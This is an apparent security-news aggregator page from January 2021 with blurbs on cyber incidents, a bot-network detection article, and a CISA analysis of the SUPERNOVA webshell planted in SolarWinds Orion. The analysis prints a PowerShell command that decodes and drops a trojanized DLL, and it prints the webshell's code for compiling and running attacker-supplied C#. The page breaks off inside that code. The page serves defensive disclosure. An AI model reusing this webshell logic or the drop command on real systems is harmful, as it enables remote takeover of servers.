Malware Devil

Wednesday, January 27, 2021

TeamTNT Cloaks Malware With Open-Source Tool

The detection-evasion tool, libprocesshider, hides TeamTNT’s malware from process-information programs.



https://malwaredevil.com/2021/01/27/teamtnt-cloaks-malware-with-open-source-tool/?utm_source=rss&utm_medium=rss&utm_campaign=teamtnt-cloaks-malware-with-open-source-tool

What are Windows Process Creation Events and Why You Should Enable Them

2020 was certainly an eventful year in the land of cybersecurity. There was no shortage of ransomware attacks and data breaches, and my personal prediction is that 2021 will be no different. Large organizations are increasingly making significant investments in…

The post What are Windows Process Creation Events and Why You Should Enable Them appeared first on LogRhythm.




https://malwaredevil.com/2021/01/27/what-are-windows-process-creation-events-and-why-you-should-enable-them/?utm_source=rss&utm_medium=rss&utm_campaign=what-are-windows-process-creation-events-and-why-you-should-enable-them

NetWalker Ransomware Suspect Charged: Tor Site Seized

The suspect allegedly has extorted $27.6 million from ransomware victims, mostly in the healthcare sector.



https://malwaredevil.com/2021/01/27/netwalker-ransomware-suspect-charged-tor-site-seized/?utm_source=rss&utm_medium=rss&utm_campaign=netwalker-ransomware-suspect-charged-tor-site-seized

The New Year in Cybersecurity: Supply Chain Attacks, Part 1

Hey there, and happy New Year. I wanted to take a moment and write about what I think the coming year is going to look like for information security professionals. This is going to be an introductory post to a multi-part series of blogs so I can talk about different topics a bit more […]

The post The New Year in Cybersecurity: Supply Chain Attacks, Part 1 appeared first on Hurricane Labs.




https://malwaredevil.com/2021/01/27/the-new-year-in-cybersecurity-supply-chain-attacks-part-1/?utm_source=rss&utm_medium=rss&utm_campaign=the-new-year-in-cybersecurity-supply-chain-attacks-part-1

Remote Attackers Can Now Reach Protected Network Devices via NAT Slipstreaming

A new version of NAT slipstreaming allows cybercriminals an easy path to devices that aren’t connected to the internet.



https://malwaredevil.com/2021/01/27/remote-attackers-can-now-reach-protected-network-devices-via-nat-slipstreaming/?utm_source=rss&utm_medium=rss&utm_campaign=remote-attackers-can-now-reach-protected-network-devices-via-nat-slipstreaming

Platform9, Swimlane, SonicWall 0-Days, & Fortinet – ESW #214

This week, in the Enterprise Security News, Platform9 unburdens users from the complexities of Kubernetes, Swimlane Raises $40 Million, SonicWall hacked by zero-days in its own products, Deloitte Buys Root9B, Cygilant and SentinelOne Partnership, Fortinet announces AI-powered XDR, AlgoSec Announced updates to A32, ESET Launches Enhanced Cloud-based Endpoint Security Management, Entrust acquires HyTrust, LogRhythm acquires MistNet, Huntress Acquires EDR Technology From Level Effect, & more!

Visit https://www.securityweekly.com/esw for all the latest episodes!

Show Notes: https://securityweekly.com/esw214




https://malwaredevil.com/2021/01/27/platform9-swimlane-sonicwall-0-days-fortinet-esw-214-4/?utm_source=rss&utm_medium=rss&utm_campaign=platform9-swimlane-sonicwall-0-days-fortinet-esw-214-4

DNS Hijacking – Fredrik Nordberg Almroth – ESW #214

Fredrik Nordberg Almroth, Security Researcher at Detectify, tells the story of how he managed to claim the top-level domain of an entire country – the Congo (DRC), .cd – before any bad actors could snatch it up. He will also discuss domain takeovers (TLD as well as subdomains) and how they can be prevented. Key to this is to keep track of your assets and monitor them for vulns.

Visit https://www.securityweekly.com/esw for all the latest episodes!

Show Notes: https://securityweekly.com/esw214




https://malwaredevil.com/2021/01/27/dns-hijacking-fredrik-nordberg-almroth-esw-214/?utm_source=rss&utm_medium=rss&utm_campaign=dns-hijacking-fredrik-nordberg-almroth-esw-214

Digital Defense, Inc. Technology Integration with LogRhythm Improves Threat Detection and Response Through Risk-Based Prioritization

Digital Defense, Inc. announced the integration of its Frontline Vulnerability Manager™ (Frontline VM™) proprietary scanning technology, part of its Frontline.Cloud™ cloud-native software as a service (SaaS) platform, with the LogRhythm NextGen SIEM Platform.

The post Digital Defense, Inc. Technology Integration with LogRhythm Improves Threat Detection and Response Through Risk-Based Prioritization appeared first on LogRhythm.




https://malwaredevil.com/2021/01/27/digital-defense-inc-technology-integration-with-logrhythm-improves-threat-detection-and-response-through-risk-based-prioritization/?utm_source=rss&utm_medium=rss&utm_campaign=digital-defense-inc-technology-integration-with-logrhythm-improves-threat-detection-and-response-through-risk-based-prioritization

Celebrate Data Privacy Day with Advice from Top Data Privacy Experts

Tomorrow, January 28, is Data Privacy Day! Data protection is a large part of our work at Hyperproof, …

The post Celebrate Data Privacy Day with Advice from Top Data Privacy Experts appeared first on Hyperproof.




https://malwaredevil.com/2021/01/27/celebrate-data-privacy-day-with-advice-from-top-data-privacy-experts/?utm_source=rss&utm_medium=rss&utm_campaign=celebrate-data-privacy-day-with-advice-from-top-data-privacy-experts


ICS Purdue Model in Industrial Internet of Things (IIoT) & Cloud

OT Cybersecurity teams have been working within the Purdue Enterprise Reference Architecture since it was created in the mid-1990s. Although not developed as a security model, by mapping the interconnections and interdependencies of the high-level components of typical industrial control systems (ICS), the Purdue reference architecture has provided important guidance for how to defend OT systems. The adoption of numerous IT systems into OT environments, however, has raised questions about the continued relevance of the ICS Purdue model.

The post ICS Purdue Model in Industrial Internet of Things (IIoT) & Cloud appeared first on Security Boulevard.




https://malwaredevil.com/2021/01/27/ics-purdue-model-in-industrial-internet-of-things-iiot-cloud/?utm_source=rss&utm_medium=rss&utm_campaign=ics-purdue-model-in-industrial-internet-of-things-iiot-cloud

Pow! Emotet’s down. Is it out?

In a coordinated action, multiple law enforcement agencies have seized control of the Emotet botnet. Agencies from eight countries worked together to deliver what they hope will be a decisive blow against one of the world’s most dangerous and sophisticated computer security threats.

The Emotet threat

In a statement announcing the action,  Europol described Emotet as “one of the most significant botnets of the past decade” and the world’s “most dangerous” malware.

The malware has been a significant thorn in the side of victims, malware researchers and law enforcement since it first emerged in 2014. Originally designed as a banking Trojan, the software became notorious for its frequent shapeshifting and its ability to cause problems for people trying to detect it. This led to it being used as a gateway for other kinds of malware. Emotet’s criminal operators succeeded in infiltrating millions of Windows machines, and then sold access to those machines to other malware operators.

Taking down Emotet’s infrastructure not only hobbles Emotet, it also disrupts an important pillar of the malware delivery ecosystem.

The takedown

Successful botnets are typically highly distributed and very resilient to takedown attempts. Effective law enforcement cooperation is therefore vital, so that all parts of the system are tackled at the same time, ensuring the botnet can’t reemerge from any remnants that go untouched.

In this case, that meant tackling hundreds of servers simultaneously. Describing the level of cooperation required, Malwarebytes’ Director of Threat Intelligence, Jerome Segura said:

Going after any botnet is always a challenging task, but the stakes were even higher with Emotet. Law Enforcement agencies had to neutralize Emotet’s three different botnets and their respective controllers.

Although it gives few details, the Europol press release hints that a novel and sophisticated approach was used in the action, stating that the Emotet botnet was compromised “from the inside”. According to the agency, “This is a unique and new approach to effectively disrupt the activities of the facilitators of cybercrime.”

Segura added:

Unlike the recent and short-lived attempt to take down TrickBot, authorities have made actual arrests in Ukraine and have also identified several other individuals that were customers of the Emotet botnet. This is a very impactful action that likely will result in the prolonged success of this global takedown.

It remains to be seen if this is the final chapter of the Emotet story, but even if it is, we aren’t at the end of the story just yet.

This action removes the threat posed by Emotet, by preventing it from contacting the infrastructure it uses to update itself and deliver malware. However, the infections remain, albeit in an inert state. To complete the eradication of Emotet, those infections will need to be cleaned up too.

The knockout?

In a highly unusual step, it looks as if the cleanup isn’t going to be left to chance. A few hours after the takedown was announced, ZDNet broke the news that law enforcement in the Netherlands is in the process of deploying an Emotet update that will remove any remaining infections on March 25th, 2021.

The post Pow! Emotet’s down. Is it out? appeared first on Malwarebytes Labs.




https://malwaredevil.com/2021/01/27/pow-emotets-down-is-it-out/?utm_source=rss&utm_medium=rss&utm_campaign=pow-emotets-down-is-it-out

Big Tech Insider’s Guide: Silicon Valley Bus History

This also could be titled an intro to Silicon Valley ethics: 1617 rent-able carriages (shared ride) by order of monarch 1662 fixed routes for shared ride by order of monarch 1823 Stanislas Baudry’s Omnés Omnibus (for everyone) 1853 Impériale omnibus (upper deck cheaper) 2008 Google bus (no poor people allowed) 2017 Lyft shuttle (no poor … Continue reading Big Tech Insider’s Guide: Silicon Valley Bus History

The post Big Tech Insider’s Guide: Silicon Valley Bus History appeared first on Security Boulevard.




https://malwaredevil.com/2021/01/27/big-tech-insiders-guide-silicon-valley-bus-history/?utm_source=rss&utm_medium=rss&utm_campaign=big-tech-insiders-guide-silicon-valley-bus-history

BSidesSF 2020 – Allan Friedman’s ‘How Software Transparency Can Help Save The World’

Many thanks to BSidesSF and the conference speakers for publishing their outstanding presentations, which originally appeared at the organization’s BSidesSF 2020 and on the DEF CON YouTube channel. Additionally, BSidesSF 2021 will take place on March 6 to 9, 2021, at no cost to participate. Enjoy!


The post BSidesSF 2020 – Allan Friedman’s ‘How Software Transparency Can Help Save The World’ appeared first on Security Boulevard.




https://malwaredevil.com/2021/01/27/bsidessf-2020-allan-friedmans-how-software-transparency-can-help-save-the-world/?utm_source=rss&utm_medium=rss&utm_campaign=bsidessf-2020-allan-friedmans-how-software-transparency-can-help-save-the-world

XKCD ‘Trash Compactor Party’

via the comic delivery system monikered Randall Munroe resident at XKCD!


The post XKCD ‘Trash Compactor Party’ appeared first on Security Boulevard.




https://malwaredevil.com/2021/01/27/xkcd-trash-compactor-party/?utm_source=rss&utm_medium=rss&utm_campaign=xkcd-trash-compactor-party

4 Clues to Spot a Bot Network

Protect against misinformation and disinformation campaigns by learning how to identify the bot networks spreading falsehoods.

Misinformation and disinformation have scaled in the Information Age. MIT researchers analyzed 126,000 stories between 2006 and 2016 and found that false stories spread six times faster than true stories on social networks. Whether falsehoods are deliberate (disinformation) or unintentional (misinformation), they impact every aspect of society, from politics to public health to commerce. But one thing falsehoods have in common is that they typically rely heavily on bot networks or automation for distribution. The following four social media behaviors are clues that you are dealing with a bot network versus a legitimate person or business.

1. Unnaturally Dense Relationship Networks
In order to appear important or authoritative, an account has to have a critical mass of followers or correspondence. Therefore, when a disingenuous actor is creating a network of bots, they cannot simply create an account and start reposting false information; instead, the account must be created with a network of “friends” to give it an air of authority. Since these are created accounts, they generally also create fake relationships. Bots are usually most connected to other bots. From a relationship-network perspective, a bot network exhibits unnaturally dense and interconnected organizations that have limited connectivity to real, verifiable accounts. Typically, bot networks exhibit the following traits:

  • Bots are connected, but their reach outside the network is limited.
  • The limited connections to the “real world” tend to give insight into the people and topics that the bots are designed to influence.
  • Sometimes, “master” bot accounts are given more rigorous backstopping to give the appearance of real people and often have more connections to the “real world,” but the other bots within these dense networks have thin profiles.
  • “Master” bot profiles use slightly pixelated profile pictures to thwart image-matching software.

Analyzing secondary and tertiary connections is key. Bot networks almost always sit on the periphery of the real conversation; a bot cluster is like a tumor hanging from the side of the true network. If you do an effective job of mapping the full network of relationships around a topic, then detecting these unusual, dense clusters on the periphery can be straightforward.

2. Reusing Post-Generating Algorithms
Typical human interactions involve a mix of original content, reposts from other authors, and engaging with or replying to conversation streams. In contrast, bots have little (if any) original content, repost almost exclusively, and have no engagement in actual conversations. The vast majority of bots are not sophisticated enough to effectively vary their reposted content, making it extremely easy to detect the specific sources of misinformation/disinformation they are designed to promote. Even more sophisticated bots that try to vary their content and sourcing still show high levels of automation. This is especially easy to detect when looking at the coordination across the entire bot network, as you can see how the connected network was designed to propagate a message.

3. Highly Uniform Posting Schedules
Humans post when the mood strikes, taking time out to eat, sleep, and live. Even though humans have patterns in behavior (e.g., always engaging online before work and before going to bed), they show daily variability and have regular times away (e.g., vacations). Less sophisticated bots follow strict posting schedules; for example, they often post on 24-hour cycles, leaving no time for sleep. Even the more sophisticated bots that employ randomization for posting content and have built-in downtime eventually exhibit patterns that can be identified. Analyzing the posting schedule reveals patterns that are inconsistent with human behavior.

4. Positioning to Influence Specific Audiences
The target of a bot network is typically identifiable because bot networks are tools designed for achieving specific information goals. Here are two examples.

A series of accounts generated more than 45,000 posts, averaging 18 posts per hour, 24 hours a day (with no time for sleep, etc.). Over 80% of the content overlapped between accounts. But the final piece of the puzzle came by looking at the external connections. In this case, the bot network was pushing content from aspiring authors, songwriters, and artists. You could see that these verifiable artists had likely purchased services designed to increase their social following that employ bot networks for increasing follower counts and sending a signal that an artist is an up-and-comer breaking onto the scene.

While investigating foreign influence regarding policy toward the Syrian Civil War, we discovered an account and subsequent network where every influential account voiced deep mistrust of the West and significant support for all Russian geopolitical positions. All of the accounts in this network reposted each other, creating a pro-Russian, anti-Western “echo chamber” that was designed to promote Russian policies throughout Europe and the West.

Look for Clues
Bot networks are common vectors for false information, but there are certain behaviors and traits to look for that can tip you off that these accounts aren’t backed by independent people or businesses. Put these clues to work the next time you’re confronted with questionable information to keep falsehoods from spreading.
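The four clues above can be turned into measurements that an analyst can run over collected follow graphs and posting histories. The Python below is an added example and is not part of the article; it uses a constructed toy dataset (five bot accounts, three ordinary users, made-up follow edges and post timestamps), and the numeric thresholds in assess() are illustrative assumptions rather than figures from the article.

```python
from datetime import datetime, timedelta

# Constructed toy data (not real accounts): five bots "b1".."b5" and three
# ordinary users "u1".."u3". Thresholds further down are illustrative assumptions.
BOTS = ["b1", "b2", "b3", "b4", "b5"]
HUMANS = ["u1", "u2", "u3"]

# Follow graph. Every bot follows every other bot; only the "master" bot b1
# follows anyone outside the cluster. Humans follow each other and outsiders.
FOLLOWS = {b: {o for o in BOTS if o != b} for b in BOTS}
FOLLOWS["b1"] |= set(HUMANS)
FOLLOWS.update({
    "u1": {"u2", "u3", "news_outlet", "colleague"},
    "u2": {"u1", "news_outlet", "brand"},
    "u3": {"u1", "u2", "colleague"},
})


def build_posts():
    """Bots repost one text every hour around the clock; humans post original text at waking hours."""
    start = datetime(2021, 1, 25)
    posts = {}
    for b in BOTS:
        posts[b] = [(start + timedelta(hours=k), "RT @seed: read this thread") for k in range(48)]
    for u in HUMANS:
        posts[u] = [(start + timedelta(days=d, hours=h), f"{u} on day {d} at {h}h")
                    for d in range(2) for h in (7, 8, 12, 18, 21, 22)]
    return posts


POSTS = build_posts()


def cluster_reach(cluster, follows):
    """Clue 1: follow edges staying inside the cluster vs. leaving it; the outside targets are clue 4."""
    internal, external, targets = 0, 0, set()
    for acct in cluster:
        for other in follows.get(acct, ()):
            if other in cluster:
                internal += 1
            else:
                external += 1
                targets.add(other)
    return internal, external, sorted(targets)


def content_overlap(cluster, posts):
    """Clue 2: share of the cluster's posts whose exact text also appears under another account."""
    owners = {}
    for acct in cluster:
        for _, text in posts[acct]:
            owners.setdefault(text, set()).add(acct)
    total = sum(len(posts[a]) for a in cluster)
    shared = sum(1 for a in cluster for _, text in posts[a] if len(owners[text]) > 1)
    return shared / total if total else 0.0


def schedule_stats(timestamps):
    """Clue 3: number of distinct hours of the day with a post, and the longest silent gap."""
    ts = sorted(timestamps)
    hours_active = len({t.hour for t in ts})
    longest_gap = max((b - a for a, b in zip(ts, ts[1:])), default=timedelta(0))
    return hours_active, longest_gap


def assess(cluster, follows, posts):
    """Apply the four clues to a candidate cluster and return the flags raised."""
    internal, external, targets = cluster_reach(cluster, follows)
    reach = external / (internal + external) if internal + external else 0.0
    overlap = content_overlap(cluster, posts)
    round_the_clock = []
    for acct in cluster:
        hours_active, longest_gap = schedule_stats([t for t, _ in posts[acct]])
        if hours_active >= 20 and longest_gap <= timedelta(hours=3):   # assumed: no sleep gap
            round_the_clock.append(acct)
    flags = []
    if reach < 0.2:      # assumed threshold
        flags.append("dense cluster with little reach outside itself")
    if overlap > 0.8:    # assumed threshold
        flags.append("reposted content dominates the cluster")
    if round_the_clock:
        flags.append("accounts post around the clock with no sleep gap")
    return {"reach": reach, "overlap": overlap, "round_the_clock": round_the_clock,
            "external_targets": targets, "flags": flags}


if __name__ == "__main__":
    for name, cluster in (("bots", BOTS), ("humans", HUMANS)):
        print(name, assess(cluster, FOLLOWS, POSTS))
```

On the toy data the bot cluster raises all three behavioural flags and its few outside edges point straight at the accounts it was built to influence, while the human group raises none. On real data the thresholds need tuning per platform, and exact-text overlap should be replaced by a similarity measure for the more sophisticated bots the article mentions.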

Kevin Graham served as an active-duty US Marine Corps infantryman before continuing his service as a government civilian. His career as an intelligence professional has provided numerous deployments around the world, serving in a multitude of capacities while supporting …




https://malwaredevil.com/2021/01/27/4-clues-to-spot-a-bot-network/?utm_source=rss&utm_medium=rss&utm_campaign=4-clues-to-spot-a-bot-network

AR21-027A: MAR-10319053-1.v1 – Supernova

Original release date: January 27, 2021

Description

Malware Analysis Report
10319053.r1.v1
2021-01-26

Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

This report provides detailed analysis of several malicious artifacts, affecting the SolarWinds Orion product, which have been identified by the security company FireEye as SUPERNOVA. According to a SolarWinds advisory, SUPERNOVA is not embedded within the Orion platform as a supply chain attack; rather, it is placed by an attacker directly on a system that hosts SolarWinds Orion and is designed to appear as part of the SolarWinds product. CISA’s assessment is that SUPERNOVA is not part of the SolarWinds supply chain attack described in Alert AA20-352A. See the section in Microsoft’s blog titled “Additional malware discovered” for more information.

This report describes the analysis of a PowerShell script that decodes and installs SUPERNOVA, a malicious webshell backdoor. SUPERNOVA is embedded in a trojanized version of the Solarwinds Orion Web Application module called “App_Web_logoimagehandler.ashx.b6031896.dll.” The SUPERNOVA malware allows a remote operator to dynamically inject C# source code into a web portal provided via the SolarWinds software suite. The injected code is compiled and directly executed in memory.

For a downloadable copy of IOCs, see: MAR-10319053-1.v1.stix.

Submitted Files (3)

02c5a4770ee759593ec2d2ca54373b63dea5ff94da2e8b4c733f132c00fc7ea1 (AssemblyInfo__.ini)

290951fcc76b497f13dcb756883be3377cd3a4692e51350c92cac157fc87e515 (1.ps1)

c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71 (App_Web_logoimagehandler.ashx….)

Findings

290951fcc76b497f13dcb756883be3377cd3a4692e51350c92cac157fc87e515

Tags

trojan

Details
Name 1.ps1
Size 10609 bytes
Type ASCII text, with very long lines
MD5 4423a4353a0e7972090413deb40d56ad
SHA1 8004d78e6934efb4dea8baf48a589c2c1ed10bf3
SHA256 290951fcc76b497f13dcb756883be3377cd3a4692e51350c92cac157fc87e515
SHA512 5d2dee3c8e4c6a4fa1d84e434ab0b864245fae51360e03ed7338c2b40d7c1d61aad755f8c54615197100dd3b8bfd00d33b256178123002b7c07779c257fa13db
ssdeep 192:9x2OrPgH8XWECNsW4IX4SLY0tqIeZ9StIGca/HjKxnlyImIwN:Fr28XWECNsbIX4SLY0BeZ9StI9OHjMlw
Entropy 4.457683
Antivirus
Microsoft Security Essentials Trojan:MSIL/Solorigate.G!dha
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
290951fcc7… Contains c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71
Description

This file is an event log that details the execution of a PowerShell script designed to Base64 decode and install a 32-bit .NET dynamic-link library (DLL) into the following location: “C:\inetpub\SolarWinds\bin\App_Web_logoimagehandler.ashx.b6031896.dll” (c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71). The DLL is patched with the SUPERNOVA webshell and is a replacement for a legitimate SolarWinds DLL.

Displayed below is a portion of the event log with the victim information redacted. It indicates the malicious PowerShell was executed by the legitimate SolarWinds application “E:\Program Files (x86)\SolarWinds\Orion\SolarWinds.BusinessLayerHost.exe.”

–Begin event log–
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";$f="C:\inetpub\SolarWinds\bin\App_Web_logoimagehandler.ashx.b6031896.dll";$bs=[Convert]::FromBase64String($b);[IO.File]::WriteAllBytes($f $bs)' 'S-1-0-0' '-' '-' '0x0000000000000000' 'E:\Program Files (x86)\SolarWinds\Orion\SolarWinds.BusinessLayerHost.exe' 'S-1-16-16384'] Computer Name: [redacted].[redacted].net Record Number: 12551353 Event Level: 0
–End event log–
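The event log above gives a defender two concrete things to hunt for: a PowerShell command that Base64-decodes a blob and writes it into the SolarWinds web bin directory, and the resulting DLL, whose SHA256 is listed in this report. The Python below is an added example (not CISA's tooling) that scans PowerShell command-line or script-block text for that pattern and checks a decoded payload against the report's hash. The event text, the placeholder Base64 body, and the `$b` variable name it keys on (taken from the log shown above) are constructed for the example; a real triage would feed it Event ID 4688 command lines or PowerShell 4104 script blocks.

```python
import base64
import hashlib
import re

# Constructed sample events in the shape of the log above. The Base64 body is a
# placeholder ("AAAA" decodes to three zero bytes), not the real DLL.
SAMPLE_EVENTS = [
    r"Process Command Line: powershell -c $b='AAAA';$f='C:\inetpub\SolarWinds\bin\App_Web_logoimagehandler.ashx.b6031896.dll';$bs=[Convert]::FromBase64String($b);[IO.File]::WriteAllBytes($f,$bs)",
    r"Process Command Line: powershell -c Get-Service | Out-File C:\temp\services.txt",
]

# SHA256 of the trojanized handler DLL as listed in this report.
SUPERNOVA_DLL_SHA256 = "c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71"

DECODE_RE = re.compile(r"FromBase64String", re.I)
WRITE_RE = re.compile(r"WriteAllBytes", re.I)
# Any App_Web_*.dll dropped into the SolarWinds web bin directory.
TARGET_RE = re.compile(r"\\SolarWinds\\bin\\App_Web_[^'\"\s]*\.dll", re.I)
# The decoded blob is held in $b in the log above (assumption: same variable name).
PAYLOAD_RE = re.compile(r"\$b\s*=\s*['\"]([A-Za-z0-9+/=]+)['\"]")


def classify_event(text):
    """Return the indicator names found in one PowerShell event (empty list if clean)."""
    hits = []
    if DECODE_RE.search(text) and WRITE_RE.search(text):
        hits.append("base64-decode-to-file")
    if TARGET_RE.search(text):
        hits.append("writes-solarwinds-handler-dll")
    return hits


def scan_events(events):
    """Index every event that raised at least one indicator."""
    findings = []
    for i, text in enumerate(events):
        hits = classify_event(text)
        if hits:
            findings.append((i, hits))
    return findings


def extract_payload(text):
    """Decode the embedded Base64 blob so the dropped file can be hashed without touching disk."""
    m = PAYLOAD_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True)
    except ValueError:
        return None


def dll_matches_report(data):
    """True when the decoded payload is byte-identical to the DLL analysed in this report."""
    if data is None:
        return False
    return hashlib.sha256(data).hexdigest() == SUPERNOVA_DLL_SHA256


if __name__ == "__main__":
    for idx, hits in scan_events(SAMPLE_EVENTS):
        payload = extract_payload(SAMPLE_EVENTS[idx])
        print(idx, hits, "known SUPERNOVA DLL" if dll_matches_report(payload) else "hash not in report")
```

A non-matching hash does not clear the host: the decode-and-write pattern into the SolarWinds bin directory is itself the finding, and the on-disk DLL should still be hashed and compared against the values in the Details section.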

c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71

Tags

backdoor, trojan

Details
Name App_Web_logoimagehandler.ashx.b6031896.dll
Size 7680 bytes
Type PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 56ceb6d0011d87b6e4d7023d7ef85676
SHA1 75af292f34789a1c782ea36c7127bf6106f595e8
SHA256 c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71
SHA512 f7eac6ab99fe45ca46417cdca36ba27560d5f8a2f37f378ba97636662595d55fa34f749716971aa96a862e37e0199eb6cb905636e6ab0123cfa089adba450629
ssdeep 192:8/SqRzbt0GBDawA5uT8wSlyDDGTBNFkQ:8/SyHKGBDax5uThDD6BNr
Entropy 4.622450
Antivirus
Ahnlab Backdoor/Win32.SunBurst
Antiy Trojan/MSIL.Agent
Avira TR/Sunburst.BR
BitDefender Trojan.Supernova.A
Clamav Win.Countermeasure.SUPERNOVA-9808999-1
Comodo Backdoor
Cyren W32/Supernova.GYFL-6114
ESET a variant of MSIL/SunBurst.A trojan
Emsisoft Trojan.Supernova.A (B)
Ikarus Backdoor.Sunburst
K7 Trojan ( 00574a531 )
Lavasoft Trojan.Supernova.A
McAfee Trojan-sunburst
Microsoft Security Essentials Trojan:MSIL/Solorigate.G!dha
NANOAV Trojan.Win32.Sunburst.iduxaq
Quick Heal Backdoor.Sunburst
Sophos Mal/Sunburst-B
Symantec Backdoor.SuperNova
Systweak trojan-backdoor.sunburst-r
TrendMicro Trojan.59AF4B5F
TrendMicro House Call Trojan.59AF4B5F
VirusBlokAda TScope.Trojan.MSIL
Zillya! Trojan.SunBurst.Win32.3
YARA Rules

No matches found.

ssdeep Matches
100 5976f9a3f7dcd2c124f1664003a1bb607bc22abc2c95abe5ecd645a5dbfe2c6c
PE Metadata
Compile Date 2020-03-24 05:16:10-04:00
Import Hash dae02f32a21e03ce65412f6e56942daa
Company Name None
File Description  
Internal Name App_Web_logoimagehandler.ashx.b6031896.dll
Legal Copyright  
Original Filename App_Web_logoimagehandler.ashx.b6031896.dll
Product Name None
Product Version 0.0.0.0
PE Sections
MD5 Name Raw Size Entropy
21556dbcb227ba907e33b0847b427ef4 header 512 2.597488
9002a963c87901397a986c3333d09627 .text 5632 5.285309
78888431b10a2bf283387437a750bca3 .rsrc 1024 2.583328
45ded0a8dacde15cb402adfe11b0fe3e .reloc 512 0.081539
Packers/Compilers/Cryptors
Microsoft Visual C# / Basic .NET
Relationships
c15abaf51e… Contained_Within 290951fcc76b497f13dcb756883be3377cd3a4692e51350c92cac157fc87e515
Description

This file is a 32-bit .NET DLL that has been identified as a modified SolarWinds plug-in. The malware patched into this plug-in has been identified as SUPERNOVA. The modification includes the “DynamicRun” export function which is designed to accept and parse provided arguments. The arguments are expected to partially contain C# code, which the function will compile and execute directly in system memory. The purpose of this malware indicates the attacker has identified a vulnerability that allows them to dynamically provide a custom “HttpContext” data structure to the web application’s “ProcessRequest” function.

The ProcessRequest function takes an HttpContext data structure as an argument. It parses portions of the request substructure of the parent HttpContext data structure using the keys “codes”, “clazz”, “method”, and “args”. The parsed data is placed in the respective variables codes, clazz, method, and args. These four variables are then provided as arguments to the DynamicRun function described next.

The “DynamicRun” function is designed to accept C# code and then dynamically compile and execute it. The “codes” variable provided to the function contains the actual C# code. The “clazz” variable provides the class name that is used when compiling the source code. The “method” variable will contain the function name that will be called for the newly compiled class. The “args” variable will contain the arguments provided to the executed malicious class.

After parsing out and executing the provided code, the “ProcessRequest” function will continue on to call a function named “WebSettingsDAL.get_NewNOCSiteLogo.” Analysis indicates this is a valid SolarWinds function designed to render the product logo on a web application.

–Begin ProcessRequest Function–
public void ProcessRequest(HttpContext context)
{
   // SUPERNOVA addition: the four request parameters are handed to DynamicRun
   // for in-memory compilation; any exception is swallowed so the handler
   // behaves normally when the parameters are absent.
   try
   {
    string codes = context.Request["codes"];
    string clazz = context.Request["clazz"];
    string method = context.Request["method"];
    string[] args = context.Request["args"].Split('\n');
    context.Response.ContentType = "text/plain";
    context.Response.Write(this.DynamicRun(codes, clazz, method, args));
   }
   catch (Exception ex)
   {
   }
   // Original SolarWinds logo-handler logic follows.
   NameValueCollection queryString = HttpUtility.ParseQueryString(context.Request.Url.Query);
   try
   {
    string str1 = queryString["id"];
    string s;
    if (!(str1 == "SitelogoImage"))
    {
       if (!(str1 == "SiteNoclogoImage"))
        throw new ArgumentOutOfRangeException(queryString["id"]);
       s = WebSettingsDAL.get_NewNOCSiteLogo();
    }
    else
       s = WebSettingsDAL.get_NewSiteLogo();
    byte[] buffer = Convert.FromBase64String(s);
    if ((buffer == null || buffer.Length == 0) && File.Exists(HttpContext.Current.Server.MapPath("//NetPerfMon//images//NoLogo.gif")))
       buffer = File.ReadAllBytes(HttpContext.Current.Server.MapPath("//NetPerfMon//images//NoLogo.gif"));
    // Sniff the content type from magic bytes: FF D8 (JPEG), "GIF" (GIF), 89 50 4E 47 0D 0A 1A 0A (PNG).
    string str2 = buffer.Length < 2 || buffer[0] != byte.MaxValue || buffer[1] != (byte) 216 ? (buffer.Length < 3 || buffer[0] != (byte) 71 || (buffer[1] != (byte) 73 || buffer[2] != (byte) 70) ? (buffer.Length < 8 || buffer[0] != (byte) 137 || (buffer[1] != (byte) 80 || buffer[2] != (byte) 78) || (buffer[3] != (byte) 71 || buffer[4] != (byte) 13 || (buffer[5] != (byte) 10 || buffer[6] != (byte) 26)) || buffer[7] != (byte) 10 ? "image/jpeg" : "image/png") : "image/gif") : "image/jpeg";
    context.Response.OutputStream.Write(buffer, 0, buffer.Length);
    context.Response.ContentType = str2;
    context.Response.Cache.SetCacheability(HttpCacheability.Private);
    context.Response.StatusDescription = "OK";
    context.Response.StatusCode = 200;
    return;
   }
   catch (Exception ex)
   {
    LogoImageHandler._log.Error((object) "Unexpected error trying to provide logo image for the page.", ex);
   }
   context.Response.Cache.SetCacheability(HttpCacheability.NoCache);
   context.Response.StatusDescription = "NO IMAGE";
   context.Response.StatusCode = 500;
}
–End ProcessRequest Function–

–Begin DynamicRun Function–
public string DynamicRun(string codes, string clazz, string method, string[] args)
{
   ICodeCompiler compiler = new CSharpCodeProvider().CreateCompiler();
   CompilerParameters options = new CompilerParameters();
   options.ReferencedAssemblies.Add(“System.dll”);
   options.ReferencedAssemblies.Add(“System.ServiceModel.dll”);
   options.ReferencedAssemblies.Add(“System.Data.dll”);
   options.ReferencedAssemblies.Add(“System.Runtime.dll”);
   options.GenerateExecutable = false;
   options.GenerateInMemory = true;
   string source = codes;
   CompilerResults compilerResults = compiler.CompileAssemblyFromSource(options, source);
   if (compilerResults.Errors.HasErrors)
   {
    // ISSUE: reference to a compiler-generated field
    // ISSUE: reference to a compiler-generated field
    // ISSUE: reference to a compiler-generated field
    // ISSUE: method pointer
